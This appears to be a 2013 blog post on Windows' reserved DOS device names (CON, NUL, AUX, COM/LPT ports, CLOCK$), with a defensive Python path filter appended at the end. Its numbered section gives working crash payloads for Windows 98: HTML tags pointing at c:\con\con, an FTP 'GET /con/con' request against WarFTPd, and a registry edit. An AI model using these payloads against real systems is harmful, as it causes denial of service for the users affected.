Monday, 30 September 2013

Why can't you create a folder named CON in Windows?

In MS-DOS, several special "device files" were available to aid in performing certain tasks, such as clearing the screen or deleting extraneous output from a program. In order to maintain backwards-compatibility, all versions of Windows up to and including Windows 7 will refuse to allow you to create a file with these "reserved" device file names. The following file names are reserved: 

  • CON
  • PRN
  • AUX
  • NUL
  • COM1
  • COM2
  • COM3
  • COM4
  • COM5
  • COM6
  • COM7
  • COM8
  • COM9
  • LPT1
  • LPT2
  • LPT3
  • LPT4
  • LPT5
  • LPT6
  • LPT7
  • LPT8
  • LPT9

CON, incidentally, was a device file used to capture whatever was printed onscreen.

NUL, AUX, CON, COM1-4, LPT1-3, and PRN are reserved words used for DOS devices.

These are specified in IO.SYS and date back to the early MS-DOS days. Here is a brief list:

  • CLOCK$ - System clock
  • CON - Console; combination of keyboard and screen to handle input and output
  • AUX or COM1 - First serial communication port
  • COMn - Second, third, ... communication port
  • LPT1 or PRN - First parallel port
  • NUL - Dummy port, or the "null device", which we all know under Linux as /dev/null
  • CONFIG$ - Unknown


1. Embedding image tags in HTML pages, with an image path referring to [drive]:\con\con or [drive]:\nul\nul. This will crash Windows 98 when viewing this HTML (tested on Microsoft Outlook and Eudora Pro 4.2; Netscape Messenger appears to be invulnerable to this exploit).

<A HREF="c:\con\con">crashing IE</A>
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->

2. Using GET /con/con or GET /nul/nul under WarFTPd on the root directory will also crash the operating system. Other FTP daemons have not been tested. This allows the remote exploitation of this vulnerability.

3. Modifying [HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open] to the value:
c:\con\con "%1" %* or c:\nul\nul "%1" %* will crash the system.

4. Creating an HTML page with IMG tags or HREF tags referring to the local "nul" path or the "con" path will crash the system when viewing the HTML file.

<IMG SRC="c:\con\con">
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
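
A defensive check for the paths described above, as an added example that is not part of the original post: a file server or HTML filter can reject any path whose components name a DOS device. The function names are hypothetical, and the handling of extensions and trailing dots or spaces is an assumption that goes beyond the cases listed on this page.

```python
import re

# Reserved names from the list on this page, plus CLOCK$ and CONFIG$
# from its IO.SYS device list.
RESERVED = {"CON", "PRN", "AUX", "NUL", "CLOCK$", "CONFIG$"}
RESERVED |= {f"COM{n}" for n in range(1, 10)}
RESERVED |= {f"LPT{n}" for n in range(1, 10)}

DRIVE_SPEC = re.compile(r"[A-Za-z]:")


def is_reserved_component(component):
    """Return True if a single path component names a DOS device."""
    # Assumption beyond the page: Windows ignores trailing dots and spaces,
    # and a device name followed by an extension (e.g. "NUL.txt") still
    # resolves to the device, so only the stem before the first dot counts.
    stem = component.rstrip(". ").split(".", 1)[0].rstrip(" ")
    return stem.upper() in RESERVED


def reserved_components(path):
    """Return every component of a path that names a DOS device."""
    # Split on both separators so URL-style and Windows-style paths are covered.
    parts = [p for p in re.split(r"[\\/]+", path) if p]
    return [
        p for p in parts
        if not DRIVE_SPEC.fullmatch(p) and is_reserved_component(p)
    ]


def is_safe_request_path(path):
    """Reject a requested path if any component is a device name."""
    return not reserved_components(path)


if __name__ == "__main__":
    # Constructed sample inputs modelled on the paths quoted in this post.
    samples = [
        r"c:\con\con",
        "/nul/nul",
        r"c:\clock$\clock$",
        "uploads/Aux.tar.gz",
        "/pub/readme.txt",
        "logs/console.log",
    ]
    for s in samples:
        verdict = "allow" if is_safe_request_path(s) else "reject"
        print(f"{verdict:6} {s}  {reserved_components(s)}")
```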
